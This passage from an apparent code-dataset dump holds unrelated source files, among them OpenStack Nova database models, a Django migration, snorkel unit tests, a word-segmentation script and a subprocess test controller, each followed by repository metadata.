pool = orm.relationship(ConsolePool, backref=orm.backref('consoles'))
class InstanceMetadata(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a user-provided metadata key/value pair for an instance."""
__tablename__ = 'instance_metadata'
__table_args__ = (
Index('instance_metadata_instance_uuid_idx', 'instance_uuid'),
)
id = Column(Integer, primary_key=True)
key = Column(String(255))
value = Column(String(255))
instance_uuid = Column(String(36), ForeignKey('instances.uuid'))
instance = orm.relationship(Instance, backref="metadata",
foreign_keys=instance_uuid,
primaryjoin='and_('
'InstanceMetadata.instance_uuid == '
'Instance.uuid,'
'InstanceMetadata.deleted == 0)')
class InstanceSystemMetadata(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a system-owned metadata key/value pair for an instance."""
__tablename__ = 'instance_system_metadata'
__table_args__ = (
Index('instance_uuid', 'instance_uuid'),
)
id = Column(Integer, primary_key=True)
key = Column(String(255), nullable=False)
value = Column(String(255))
instance_uuid = Column(String(36),
ForeignKey('instances.uuid'),
nullable=False)
instance = orm.relationship(Instance, backref="system_metadata",
foreign_keys=instance_uuid)
class InstanceTypeProjects(BASE, NovaBase, models.SoftDeleteMixin):
"""Represent projects associated instance_types."""
__tablename__ = "instance_type_projects"
__table_args__ = (schema.UniqueConstraint(
"instance_type_id", "project_id", "deleted",
name="uniq_instance_type_projects0instance_type_id0project_id0deleted"
),
)
id = Column(Integer, primary_key=True)
instance_type_id = Column(Integer, ForeignKey('instance_types.id'),
nullable=False)
project_id = Column(String(255))
instance_type = orm.relationship(InstanceTypes, backref="projects",
foreign_keys=instance_type_id,
primaryjoin='and_('
'InstanceTypeProjects.instance_type_id == InstanceTypes.id,'
'InstanceTypeProjects.deleted == 0)')
class InstanceTypeExtraSpecs(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents additional specs as key/value pairs for an instance_type."""
__tablename__ = 'instance_type_extra_specs'
__table_args__ = (
Index('instance_type_extra_specs_instance_type_id_key_idx',
'instance_type_id', 'key'),
schema.UniqueConstraint(
"instance_type_id", "key", "deleted",
name=("uniq_instance_type_extra_specs0"
"instance_type_id0key0deleted")
),
{'mysql_collate': 'utf8_bin'},
)
id = Column(Integer, primary_key=True)
key = Column(String(255))
value = Column(String(255))
instance_type_id = Column(Integer, ForeignKey('instance_types.id'),
nullable=False)
instance_type = orm.relationship(InstanceTypes, backref="extra_specs",
foreign_keys=instance_type_id,
primaryjoin='and_('
'InstanceTypeExtraSpecs.instance_type_id == InstanceTypes.id,'
'InstanceTypeExtraSpecs.deleted == 0)')
class Cell(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents parent and child cells of this cell. Cells can
have multiple parents and children, so there could be any number
of entries with is_parent=True or False
"""
__tablename__ = 'cells'
__table_args__ = (schema.UniqueConstraint(
"name", "deleted", name="uniq_cells0name0deleted"
),
)
id = Column(Integer, primary_key=True)
# Name here is the 'short name' of a cell. For instance: 'child1'
name = Column(String(255))
api_url = Column(String(255))
transport_url = Column(String(255), nullable=False)
weight_offset = Column(Float(), default=0.0)
weight_scale = Column(Float(), default=1.0)
is_parent = Column(Boolean())
class AggregateHost(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a host that is member of an aggregate."""
__tablename__ = 'aggregate_hosts'
__table_args__ = (schema.UniqueConstraint(
"host", "aggregate_id", "deleted",
name="uniq_aggregate_hosts0host0aggregate_id0deleted"
),
)
id = Column(Integer, primary_key=True, autoincrement=True)
host = Column(String(255))
aggregate_id = Column(Integer, ForeignKey('aggregates.id'), nullable=False)
class AggregateMetadata(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a metadata key/value pair for an aggregate."""
__tablename__ = 'aggregate_metadata'
__table_args__ = (
schema.UniqueConstraint("aggregate_id", "key", "deleted",
name="uniq_aggregate_metadata0aggregate_id0key0deleted"
),
Index('aggregate_metadata_key_idx', 'key'),
)
id = Column(Integer, primary_key=True)
key = Column(String(255), nullable=False)
value = Column(String(255), nullable=False)
aggregate_id = Column(Integer, ForeignKey('aggregates.id'), nullable=False)
class Aggregate(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a cluster of hosts that exists in this zone."""
__tablename__ = 'aggregates'
__table_args__ = ()
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String(255))
_hosts = orm.relationship(AggregateHost,
primaryjoin='and_('
'Aggregate.id == AggregateHost.aggregate_id,'
'AggregateHost.deleted == 0,'
'Aggregate.deleted == 0)')
_metadata = orm.relationship(AggregateMetadata,
primaryjoin='and_('
'Aggregate.id == AggregateMetadata.aggregate_id,'
'AggregateMetadata.deleted == 0,'
'Aggregate.deleted == 0)')
@property
def _extra_keys(self):
return ['hosts', 'metadetails', 'availability_zone']
@property
def hosts(self):
return [h.host for h in self._hosts]
@property
def metadetails(self):
return {m.key: m.value for m in self._metadata}
@property
def availability_zone(self):
if 'availability_zone' not in self.metadetails:
return None
return self.metadetails['availability_zone']
class AgentBuild(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents an agent build."""
__tablename__ = 'agent_builds'
__table_args__ = (
Index('agent_builds_hypervisor_os_arch_idx', 'hypervisor', 'os',
'architecture'),
schema.UniqueConstraint("hypervisor", "os", "architecture", "deleted",
name="uniq_agent_builds0hypervisor0os0architecture0deleted"),
)
id = Column(Integer, primary_key=True)
hypervisor = Column(String(255))
os = Column(String(255))
architecture = Column(String(255))
version = Column(String(255))
url = Column(String(255))
md5hash = Column(String(255))
class BandwidthUsage(BASE, NovaBase, models.SoftDeleteMixin):
"""Cache for instance bandwidth usage data pulled from the hypervisor."""
__tablename__ = 'bw_usage_cache'
__table_args__ = (
Index('bw_usage_cache_uuid_start_period_idx', 'uuid',
'start_period'),
)
id = Column(Integer, primary_key=True, nullable=False)
uuid = Column(String(36))
mac = Column(String(255))
start_period = Column(DateTime, nullable=False)
last_refreshed = Column(DateTime)
bw_in = Column(BigInteger)
bw_out = Column(BigInteger)
last_ctr_in = Column(BigInteger)
last_ctr_out = Column(BigInteger)
class VolumeUsage(BASE, NovaBase, models.SoftDeleteMixin):
"""Cache for volume usage data pulled from the hypervisor."""
__tablename__ = 'volume_usage_cache'
__table_args__ = ()
id = Column(Integer, primary_key=True, nullable=False)
volume_id = Column(String(36), nullable=False)
instance_uuid = Column(String(36))
project_id = Column(String(36))
user_id = Column(String(64))
availability_zone = Column(String(255))
tot_last_refreshed = Column(DateTime)
tot_reads = Column(BigInteger, default=0)
tot_read_bytes = Column(BigInteger, default=0)
tot_writes = Column(BigInteger, default=0)
tot_write_bytes = Column(BigInteger, default=0)
curr_last_refreshed = Column(DateTime)
curr_reads = Column(BigInteger, default=0)
curr_read_bytes = Column(BigInteger, default=0)
curr_writes = Column(BigInteger, default=0)
curr_write_bytes = Column(BigInteger, default=0)
class S3Image(BASE, NovaBase, models.SoftDeleteMixin):
"""Compatibility layer for the S3 image service talking to Glance."""
__tablename__ = 's3_images'
__table_args__ = ()
id = Column(Integer, primary_key=True, nullable=False, autoincrement=True)
uuid = Column(String(36), nullable=False)
class VolumeIdMapping(BASE, NovaBase, models.SoftDeleteMixin):
"""Compatibility layer for the EC2 volume service."""
__tablename__ = 'volume_id_mappings'
__table_args__ = ()
id = Column(Integer, primary_key=True, nullable=False, autoincrement=True)
uuid = Column(String(36), nullable=False)
class SnapshotIdMapping(BASE, NovaBase, models.SoftDeleteMixin):
"""Compatibility layer for the EC2 snapshot service."""
__tablename__ = 'snapshot_id_mappings'
__table_args__ = ()
id = Column(Integer, primary_key=True, nullable=False, autoincrement=True)
uuid = Column(String(36), nullable=False)
class InstanceFault(BASE, NovaBase, models.SoftDeleteMixin):
__tablename__ = 'instance_faults'
__table_args__ = (
Index('instance_faults_host_idx', 'host'),
Index('instance_faults_instance_uuid_deleted_created_at_idx',
'instance_uuid', 'deleted', 'created_at')
)
id = Column(Integer, primary_key=True, nullable=False)
instance_uuid = Column(String(36),
ForeignKey('instances.uuid'))
code = Column(Integer(), nullable=False)
message = Column(String(255))
details = Column(MediumText())
host = Column(String(255))
class InstanceAction(BASE, NovaBase, models.SoftDeleteMixin):
"""Track client actions on an instance.
The intention is that there will only be one of these per user request. A
lookup by (instance_uuid, request_id) should always return a single result.
"""
__tablename__ = 'instance_actions'
__table_args__ = (
Index('instance_uuid_idx', 'instance_uuid'),
Index('request_id_idx', 'request_id')
)
id = Column(Integer, primary_key=True, nullable=False, autoincrement=True)
action = Column(String(255))
instance_uuid = Column(String(36),
ForeignKey('instances.uuid'))
request_id = Column(String(255))
user_id = Column(String(255))
project_id = Column(String(255))
start_time = Column(DateTime, default=timeutils.utcnow)
finish_time = Column(DateTime)
message = Column(String(255))
class InstanceActionEvent(BASE, NovaBase, models.SoftDeleteMixin):
"""Track events that occur during an InstanceAction."""
__tablename__ = 'instance_actions_events'
__table_args__ = ()
id = Column(Integer, primary_key=True, nullable=False, autoincrement=True)
event = Column(String(255))
action_id = Column(Integer, ForeignKey('instance_actions.id'))
start_time = Column(DateTime, default=timeutils.utcnow)
finish_time = Column(DateTime)
result = Column(String(255))
traceback = Column(Text)
host = Column(String(255))
details = Column(Text)
class InstanceIdMapping(BASE, NovaBase, models.SoftDeleteMixin):
"""Compatibility layer for the EC2 instance service."""
__tablename__ = 'instance_id_mappings'
__table_args__ = (
Index('ix_instance_id_mappings_uuid', 'uuid'),
)
id = Column(Integer, primary_key=True, nullable=False, autoincrement=True)
uuid = Column(String(36), nullable=False)
class TaskLog(BASE, NovaBase, models.SoftDeleteMixin):
"""Audit log for background periodic tasks."""
__tablename__ = 'task_log'
__table_args__ = (
schema.UniqueConstraint(
'task_name', 'host', 'period_beginning', 'period_ending',
name="uniq_task_log0task_name0host0period_beginning0period_ending"
),
Index('ix_task_log_period_beginning', 'period_beginning'),
Index('ix_task_log_host', 'host'),
Index('ix_task_log_period_ending', 'period_ending'),
)
id = Column(Integer, primary_key=True, nullable=False, autoincrement=True)
task_name = Column(String(255), nullable=False)
state = Column(String(255), nullable=False)
host = Column(String(255), nullable=False)
period_beginning = Column(DateTime, default=timeutils.utcnow,
nullable=False)
period_ending = Column(DateTime, default=timeutils.utcnow,
nullable=False)
message = Column(String(255), nullable=False)
task_items = Column(Integer(), default=0)
errors = Column(Integer(), default=0)
class InstanceGroupMember(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents the members for an instance group."""
__tablename__ = 'instance_group_member'
__table_args__ = (
Index('instance_group_member_instance_idx', 'instance_id'),
)
id = Column(Integer, primary_key=True, nullable=False)
instance_id = Column(String(255))
group_id = Column(Integer, ForeignKey('instance_groups.id'),
nullable=False)
class InstanceGroupPolicy(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents the policy type for an instance group."""
__tablename__ = 'instance_group_policy'
__table_args__ = (
Index('instance_group_policy_policy_idx', 'policy'),
)
id = Column(Integer, primary_key=True, nullable=False)
policy = Column(String(255))
group_id = Column(Integer, ForeignKey('instance_groups.id'),
nullable=False)
class InstanceGroup(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents an instance group.
A group will maintain a collection of instances and the relationship
between them.
"""
__tablename__ = 'instance_groups'
__table_args__ = (
schema.UniqueConstraint("uuid", "deleted",
name="uniq_instance_groups0uuid0deleted"),
)
id = Column(Integer, primary_key=True, autoincrement=True)
user_id = Column(String(255))
project_id = Column(String(255))
uuid = Column(String(36), nullable=False)
name = Column(String(255))
_policies = orm.relationship(InstanceGroupPolicy, primaryjoin='and_('
'InstanceGroup.id == InstanceGroupPolicy.group_id,'
'InstanceGroupPolicy.deleted == 0,'
'InstanceGroup.deleted == 0)')
_members = orm.relationship(InstanceGroupMember, primaryjoin='and_('
'InstanceGroup.id == InstanceGroupMember.group_id,'
'InstanceGroupMember.deleted == 0,'
'InstanceGroup.deleted == 0)')
@property
def policies(self):
return [p.policy for p in self._policies]
@property
def members(self):
return [m.instance_id for m in self._members]
class PciDevice(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a PCI host device that can be passed through to instances.
"""
__tablename__ = 'pci_devices'
__table_args__ = (
Index('ix_pci_devices_compute_node_id_deleted',
'compute_node_id', 'deleted'),
Index('ix_pci_devices_instance_uuid_deleted',
'instance_uuid', 'deleted'),
Index('ix_pci_devices_compute_node_id_parent_addr_deleted',
'compute_node_id', 'parent_addr', 'deleted'),
schema.UniqueConstraint(
"compute_node_id", "address", "deleted",
name="uniq_pci_devices0compute_node_id0address0deleted")
)
id = Column(Integer, primary_key=True)
compute_node_id = Column(Integer, ForeignKey('compute_nodes.id'),
nullable=False)
# physical address of device domain:bus:slot.func (0000:09:01.1)
address = Column(String(12), nullable=False)
vendor_id = Column(String(4), nullable=False)
product_id = Column(String(4), nullable=False)
dev_type = Column(String(8), nullable=False)
dev_id = Column(String(255))
# label is abstract device name, that is used to unify devices with the
# same functionality with different addresses or host.
label = Column(String(255), nullable=False)
status = Column(String(36), nullable=False)
# the request_id is used to identify a device that is allocated for a
# particular request
request_id = Column(String(36), nullable=True)
extra_info = Column(Text)
instance_uuid = Column(String(36))
numa_node = Column(Integer, nullable=True)
parent_addr = Column(String(12), nullable=True)
instance = orm.relationship(Instance, backref="pci_devices",
foreign_keys=instance_uuid,
primaryjoin='and_('
'PciDevice.instance_uuid == Instance.uuid,'
'PciDevice.deleted == 0)')
class Tag(BASE, models.ModelBase):
"""Represents the tag for a resource."""
__tablename__ = "tags"
__table_args__ = (
Index('tags_tag_idx', 'tag'),
)
resource_id = Column(String(36), primary_key=True, nullable=False)
tag = Column(Unicode(80), primary_key=True, nullable=False)
instance = orm.relationship(
"Instance",
backref='tags',
primaryjoin='and_(Tag.resource_id == Instance.uuid,'
'Instance.deleted == 0)',
foreign_keys=resource_id
)
| 38.24896
| 79
| 0.655679
|
c01c1c1eab89496438e9652655814aee4d400256
| 251
|
py
|
Python
|
orttraining/orttraining/python/training/optim/__init__.py
|
sstamenova/onnxruntime
|
beddbdec5a100f1b94ae68d0c56d6c229fabb33b
|
[
"MIT"
] | 6,036
|
2019-05-07T06:03:57.000Z
|
2022-03-31T17:59:54.000Z
|
orttraining/orttraining/python/training/optim/__init__.py
|
sstamenova/onnxruntime
|
beddbdec5a100f1b94ae68d0c56d6c229fabb33b
|
[
"MIT"
] | 5,730
|
2019-05-06T23:04:55.000Z
|
2022-03-31T23:55:56.000Z
|
orttraining/orttraining/python/training/optim/__init__.py
|
sstamenova/onnxruntime
|
beddbdec5a100f1b94ae68d0c56d6c229fabb33b
|
[
"MIT"
] | 1,566
|
2019-05-07T01:30:07.000Z
|
2022-03-31T17:06:50.000Z
|
from .config import _OptimizerConfig, AdamConfig, LambConfig, SGDConfig
from .lr_scheduler import _LRScheduler, ConstantWarmupLRScheduler, CosineWarmupLRScheduler,\
LinearWarmupLRScheduler, PolyWarmupLRScheduler
from .fused_adam import FusedAdam
| 41.833333
| 92
| 0.860558
|
e4ce35e1c8ff96c44eaea5f172a25f83d3c6d1b7
| 369
|
py
|
Python
|
mrp_system/migrations/0016_auto_20181206_1258.py
|
mgeorge8/django_time
|
f75a442941b0ebbb6cc46a6d18e42b91695b7e57
|
[
"MIT"
] | 1
|
2018-11-09T02:09:14.000Z
|
2018-11-09T02:09:14.000Z
|
mrp_system/migrations/0016_auto_20181206_1258.py
|
mgeorge8/django_time
|
f75a442941b0ebbb6cc46a6d18e42b91695b7e57
|
[
"MIT"
] | null | null | null |
mrp_system/migrations/0016_auto_20181206_1258.py
|
mgeorge8/django_time
|
f75a442941b0ebbb6cc46a6d18e42b91695b7e57
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.1.2 on 2018-12-06 19:58
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('mrp_system', '0015_auto_20181206_1257'),
]
operations = [
migrations.RenameField(
model_name='part',
old_name='location2',
new_name='location',
),
]
| 19.421053
| 50
| 0.590786
|
de78809212ca26aee01233497bd3a0d5dd38200a
| 5,020
|
py
|
Python
|
vq_wordseg.py
|
kamperh/vqwordseg
|
fc92e4125ebaad6d7d8c376b7e0c43e6b4dce15e
|
[
"MIT"
] | 10
|
2022-02-25T15:14:09.000Z
|
2022-03-11T11:30:04.000Z
|
vq_wordseg.py
|
kamperh/vqwordseg
|
fc92e4125ebaad6d7d8c376b7e0c43e6b4dce15e
|
[
"MIT"
] | null | null | null |
vq_wordseg.py
|
kamperh/vqwordseg
|
fc92e4125ebaad6d7d8c376b7e0c43e6b4dce15e
|
[
"MIT"
] | 2
|
2022-03-09T08:39:44.000Z
|
2022-03-25T06:21:32.000Z
|
#!/usr/bin/env python
"""
Perform word segmentation on VQ representations.
Author: Herman Kamper
Contact: kamperh@gmail.com
Date: 2021
"""
from datetime import datetime
from pathlib import Path
from tqdm import tqdm
import argparse
import sys
from vqwordseg import algorithms
import eval_segmentation
#-----------------------------------------------------------------------------#
# UTILITY FUNCTIONS #
#-----------------------------------------------------------------------------#
def check_argv():
"""Check the command line arguments."""
parser = argparse.ArgumentParser(
description=__doc__.strip().split("\n")[0], add_help=False
)
parser.add_argument(
"model", help="input VQ representations",
choices=["vqvae", "vqcpc", "cpc_big", "gmm"]
)
parser.add_argument("dataset", type=str, help="input dataset")
parser.add_argument(
"split", type=str, help="input split", choices=["train", "val", "test"]
)
parser.add_argument(
"phoneseg_tag", type=str, help="input phone segmentation"
)
parser.add_argument(
"--algorithm",
help="word segmentation algorithm (default: %(default)s)",
choices=["ag", "tp", "rasanen15", "dpdp_aernn"], default="ag"
)
parser.add_argument(
"--output_tag", type=str, help="used to name the output directory; "
"if not specified, the algorithm is used",
default=None
)
parser.add_argument(
"--dur_weight", type=float,
help="the duration penalty weight",
default=None
)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
return parser.parse_args()
#-----------------------------------------------------------------------------#
# MAIN FUNCTION #
#-----------------------------------------------------------------------------#
def main():
args = check_argv()
# Command-line arguments
segment_func = getattr(algorithms, args.algorithm)
if args.output_tag is None:
args.output_tag = "wordseg_{}_{}".format(
args.algorithm,
args.phoneseg_tag.replace("phoneseg_", "")
)
if args.dur_weight is not None:
print(f"Duration weight: {args.dur_weight:.4f}")
# Phone intervals
input_dir = (
Path("exp")/args.model/args.dataset/args.split/
args.phoneseg_tag/"intervals"
)
phoneseg_interval_dict = {}
print("Reading: {}".format(input_dir))
assert input_dir.is_dir(), "missing directory: {}".format(input_dir)
phoneseg_interval_dict = eval_segmentation.get_intervals_from_dir(
input_dir
)
utterances = phoneseg_interval_dict.keys()
# # Temp
# print(list(utterances)[228], list(utterances)[5569])
# assert False
# Segmentation
print(datetime.now())
print("Segmenting:")
prepared_text = []
for utt_key in utterances:
prepared_text.append(
" ".join([i[2] + "_" for i in phoneseg_interval_dict[utt_key]])
)
if args.dur_weight is not None:
word_segmentation = segment_func(
prepared_text, dur_weight=args.dur_weight
)
else:
word_segmentation = segment_func(
prepared_text
)
print(datetime.now())
# print(prepared_text[:10])
# print(word_segmentation[:10])
# assert False
wordseg_interval_dict = {}
for i_utt, utt_key in tqdm(enumerate(utterances)):
words_segmented = word_segmentation[i_utt].split(" ")
word_start = 0
word_label = ""
i_word = 0
wordseg_interval_dict[utt_key] = []
for (phone_start,
phone_end, phone_label) in phoneseg_interval_dict[utt_key]:
word_label += phone_label + "_"
if i_word >= len(words_segmented):
wordseg_interval_dict[utt_key].append((
word_start, phoneseg_interval_dict[utt_key][-1][1],
"999_" #word_label
))
break
if words_segmented[i_word] == word_label:
wordseg_interval_dict[utt_key].append((
word_start, phone_end, word_label
))
word_label = ""
word_start = phone_end
i_word += 1
# Write intervals
output_dir = (
Path("exp")/args.model/args.dataset/args.split/
args.output_tag/"intervals"
)
output_dir.mkdir(exist_ok=True, parents=True)
print("Writing to: {}".format(output_dir))
for utt_key in tqdm(wordseg_interval_dict):
with open((output_dir/utt_key).with_suffix(".txt"), "w") as f:
for start, end, label in wordseg_interval_dict[utt_key]:
f.write("{:d} {:d} {}\n".format(start, end, label))
if __name__ == "__main__":
main()
| 32.387097
| 79
| 0.54741
|
0d01f8a63fa22896bf11249901ceb7ee7fc88c23
| 3,924
|
py
|
Python
|
test/utils/test_core.py
|
dataframing/snorkel
|
be6cec76f6758ed6f8d0ca5da7342af28ad5486c
|
[
"Apache-2.0"
] | 1
|
2019-12-25T01:13:06.000Z
|
2019-12-25T01:13:06.000Z
|
test/utils/test_core.py
|
dataframing/snorkel
|
be6cec76f6758ed6f8d0ca5da7342af28ad5486c
|
[
"Apache-2.0"
] | null | null | null |
test/utils/test_core.py
|
dataframing/snorkel
|
be6cec76f6758ed6f8d0ca5da7342af28ad5486c
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import numpy as np
from snorkel.utils import (
filter_labels,
preds_to_probs,
probs_to_preds,
to_int_label_array,
)
PROBS = np.array([[0.1, 0.9], [0.7, 0.3]])
PREDS = np.array([1, 0])
PREDS_ROUND = np.array([[0, 1], [1, 0]])
class UtilsTest(unittest.TestCase):
def test_to_int_label_array(self):
X = np.array([[1], [0], [2.0]])
Y_expected = np.array([1, 0, 2])
Y = to_int_label_array(X, flatten_vector=True)
np.testing.assert_array_equal(Y, Y_expected)
Y = to_int_label_array(X, flatten_vector=False)
Y_expected = np.array([[1], [0], [2]])
np.testing.assert_array_equal(Y, Y_expected)
X = np.array([[1], [0], [2.1]])
with self.assertRaisesRegex(ValueError, "non-integer value"):
to_int_label_array(X)
X = np.array([[1, 0], [0, 1]])
with self.assertRaisesRegex(ValueError, "1d np.array"):
to_int_label_array(X, flatten_vector=True)
def test_preds_to_probs(self):
np.testing.assert_array_equal(preds_to_probs(PREDS, 2), PREDS_ROUND)
def test_probs_to_preds(self):
np.testing.assert_array_equal(probs_to_preds(PROBS), PREDS)
# abtains with ties
probs = np.array([[0.33, 0.33, 0.33]])
preds = probs_to_preds(probs, tie_break_policy="abstain")
true_preds = np.array([-1])
np.testing.assert_array_equal(preds, true_preds)
# true random with ties
probs = np.array([[0.33, 0.33, 0.33]])
random_preds = []
for seed in range(10):
preds = probs_to_preds(probs, tie_break_policy="true-random")
random_preds.append(preds[0])
# check predicted labels within range
self.assertLessEqual(max(random_preds), 2)
self.assertGreaterEqual(min(random_preds), 0)
# deterministic random with ties
probs = np.array(
[[0.33, 0.33, 0.33], [0.0, 0.5, 0.5], [0.33, 0.33, 0.33], [0.5, 0.5, 0]]
)
random_preds = []
for _ in range(10):
preds = probs_to_preds(probs, tie_break_policy="random")
random_preds.append(preds)
# check labels are same across seeds
for i in range(len(random_preds) - 1):
np.testing.assert_array_equal(random_preds[i], random_preds[i + 1])
# check predicted labels within range (only one instance since should all be same)
self.assertLessEqual(max(random_preds[0]), 2)
self.assertGreaterEqual(min(random_preds[0]), 0)
# check invalid policy
with self.assertRaisesRegex(ValueError, "policy not recognized"):
preds = probs_to_preds(probs, tie_break_policy="negative")
# check invalid input
with self.assertRaisesRegex(ValueError, "probs must have probabilities"):
preds = probs_to_preds(np.array([[0.33], [0.33]]))
def test_filter_labels(self):
golds = np.array([-1, 0, 0, 1, 1])
preds = np.array([0, 0, 1, 1, -1])
filtered = filter_labels(
label_dict={"golds": golds, "preds": preds},
filter_dict={"golds": [-1], "preds": [-1]},
)
np.testing.assert_array_equal(filtered["golds"], np.array([0, 0, 1]))
np.testing.assert_array_equal(filtered["preds"], np.array([0, 1, 1]))
def test_filter_labels_probs(self):
golds = np.array([-1, 0, 0, 1, 1])
preds = np.array([0, 0, 1, 1, -1])
probs = np.array([[0.8, 0.2], [0.8, 0.2], [0.2, 0.8], [0.2, 0.8], [0.5, 0.5]])
filtered = filter_labels(
label_dict={"golds": golds, "preds": preds, "probs": probs},
filter_dict={"golds": [-1], "preds": [-1]},
)
np.testing.assert_array_equal(filtered["golds"], np.array([0, 0, 1]))
np.testing.assert_array_equal(filtered["preds"], np.array([0, 1, 1]))
if __name__ == "__main__":
unittest.main()
| 36.333333
| 90
| 0.596585
|
02b6125ffd5d1bd41c0bc5efb920129deab4f77f
| 1,107
|
py
|
Python
|
wagtail/tests/routablepage/models.py
|
hanpama/wagtail
|
e0e3cdc824b1acd9f9daa6d80b5455c969b385dd
|
[
"BSD-3-Clause"
] | null | null | null |
wagtail/tests/routablepage/models.py
|
hanpama/wagtail
|
e0e3cdc824b1acd9f9daa6d80b5455c969b385dd
|
[
"BSD-3-Clause"
] | null | null | null |
wagtail/tests/routablepage/models.py
|
hanpama/wagtail
|
e0e3cdc824b1acd9f9daa6d80b5455c969b385dd
|
[
"BSD-3-Clause"
] | 1
|
2019-03-05T15:37:22.000Z
|
2019-03-05T15:37:22.000Z
|
from django.http import HttpResponse
from wagtail.contrib.wagtailroutablepage.models import RoutablePage, route
def routable_page_external_view(request, arg="ARG NOT SET"):
return HttpResponse("EXTERNAL VIEW: " + arg)
class RoutablePageTest(RoutablePage):
@route(r'^$')
def main(self, request):
return HttpResponse("MAIN VIEW")
@route(r'^archive/year/(\d+)/$')
def archive_by_year(self, request, year):
return HttpResponse("ARCHIVE BY YEAR: " + str(year))
@route(r'^archive/author/(?P<author_slug>.+)/$')
def archive_by_author(self, request, author_slug):
return HttpResponse("ARCHIVE BY AUTHOR: " + author_slug)
@route(r'^external/(.+)/$')
@route(r'^external-no-arg/$')
def external_view(self, *args, **kwargs):
return routable_page_external_view(*args, **kwargs)
# By default, the method name would be used as the url name but when the
# "name" kwarg is specified, this should override the default.
@route(r'^override-name-test/$', name='name_overridden')
def override_name_test(self, request):
pass
| 33.545455
| 76
| 0.682023
|
9f2406f2ca556ff28b4d535eb6815a242f380814
| 1,785
|
py
|
Python
|
test/testContainers/test_runner/proc.py
|
guijan/appscope
|
8b507606914f486b6858b5115c44faf7d342666a
|
[
"Apache-2.0"
] | 118
|
2021-01-21T16:36:13.000Z
|
2022-03-18T09:05:18.000Z
|
test/testContainers/test_runner/proc.py
|
guijan/appscope
|
8b507606914f486b6858b5115c44faf7d342666a
|
[
"Apache-2.0"
] | 684
|
2021-01-21T06:51:06.000Z
|
2022-03-31T14:34:42.000Z
|
test/testContainers/test_runner/proc.py
|
guijan/appscope
|
8b507606914f486b6858b5115c44faf7d342666a
|
[
"Apache-2.0"
] | 26
|
2021-01-26T22:53:45.000Z
|
2022-02-11T09:19:31.000Z
|
import logging
import os
import subprocess
import time
from common import AppController
class SubprocessAppController(AppController):
def __init__(self, start_command, name, scope_path, logs_path, start_wait=5, stop_wait=11):
super().__init__(name)
self.logs_path = logs_path
self.scope_path = scope_path
self.stop_wait = stop_wait
self.start_wait = start_wait
self.start_command = start_command
self.proc = None
self.__stdout_file = None
def start(self, scoped=False):
stdout_path = os.path.join(self.logs_path, f"{self.name}_stdout.log")
logging.info(
f"Starting app {self.name} in {'scoped' if scoped else 'unscoped'} mode. Output will be stored in {stdout_path}")
env = os.environ.copy()
if scoped:
env["LD_PRELOAD"] = self.scope_path
logging.debug(f"Command is {self.start_command}. Environment {env}")
self.__stdout_file = open(stdout_path, "a")
self.proc = subprocess.Popen(self.start_command, env=env, stdout=self.__stdout_file)
time.sleep(self.start_wait)
self.assert_running()
def stop(self):
self.proc.terminate()
self.proc.communicate()
self.__stdout_file.flush()
time.sleep(self.stop_wait)
def assert_running(self):
assert self.proc.poll() is None, f"{self.name} is crashed"
def wait_for_stdout_msg(proc, msg, timeout=60):
timeout_start = time.time()
while time.time() < timeout_start + timeout:
line = proc.stdout.readline()
if not line:
break
logging.debug(line)
if msg in line:
return
raise TimeoutError(f"Message '{msg}' wasn't found in stdout after {timeout} seconds.")
| 30.775862
| 125
| 0.6493
|
f11464b7960b5195f15a43685050a4eb1b33af41
| 853
|
py
|
Python
|
10/solve.py
|
jkowalleck/AoC2020
|
861b5abbd55b58460cf1036ab5ed0b9ddaf7d770
|
[
"MIT"
] | null | null | null |
10/solve.py
|
jkowalleck/AoC2020
|
861b5abbd55b58460cf1036ab5ed0b9ddaf7d770
|
[
"MIT"
] | null | null | null |
10/solve.py
|
jkowalleck/AoC2020
|
861b5abbd55b58460cf1036ab5ed0b9ddaf7d770
|
[
"MIT"
] | null | null | null |
from collections import Counter
from os import path
from typing import Generator, List
INPUT_FILE = path.join(path.dirname(__file__), 'input')
def get_input() -> List[str]:
with open(INPUT_FILE) as fh:
return fh.read().splitlines()
def diffs(adapters: List[int]) -> Generator[int, int, None]:
yield adapters[0]
for a, adapter in enumerate(adapters[1:]):
yield adapter - adapters[a]
def solve1() -> int:
adapters = sorted(map(int, get_input()))
counts = Counter(diffs(adapters))
return counts[1] * (counts[3] + 1) # build in adapter has given diff of 3
def solve2() -> int:
# TODO
raise NotImplementedError()
if __name__ == '__main__':
solution_part1 = solve1()
print(f'solution part 1: {solution_part1}')
#solution_part2 = solve2()
#print(f'solution part 2: {solution_part2}')
| 24.371429
| 78
| 0.664713
|
0998cf5d6ed8fe8ae28cc2ed3854e21037b2efd1
| 15,291
|
py
|
Python
|
pqviz/create_dataframes.py
|
mitre/PQViz
|
229e662c408e0532df44585d134b8e79eb6c4cf8
|
[
"Apache-2.0"
] | null | null | null |
pqviz/create_dataframes.py
|
mitre/PQViz
|
229e662c408e0532df44585d134b8e79eb6c4cf8
|
[
"Apache-2.0"
] | null | null | null |
pqviz/create_dataframes.py
|
mitre/PQViz
|
229e662c408e0532df44585d134b8e79eb6c4cf8
|
[
"Apache-2.0"
] | 1
|
2022-01-18T21:00:39.000Z
|
2022-01-18T21:00:39.000Z
|
from pathlib import Path
from ipywidgets import interact, interactive, fixed, interact_manual
import ipywidgets as widgets
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
import us
def create_prevalence_df(file_path, population_group):
"""
Creates a data frame that includes the prevalences and the demographic data
Parameters:
file_path: A folder with pq outputs to compare
population_group: Type of population, expected inputs ['Pediatric', 'Adult']
Returns:
A DataFrame where the rows are distinct demographic and prevalence numbers."""
# create a list of al the csvs in path
all_files = list(file_path.glob("**/*"))
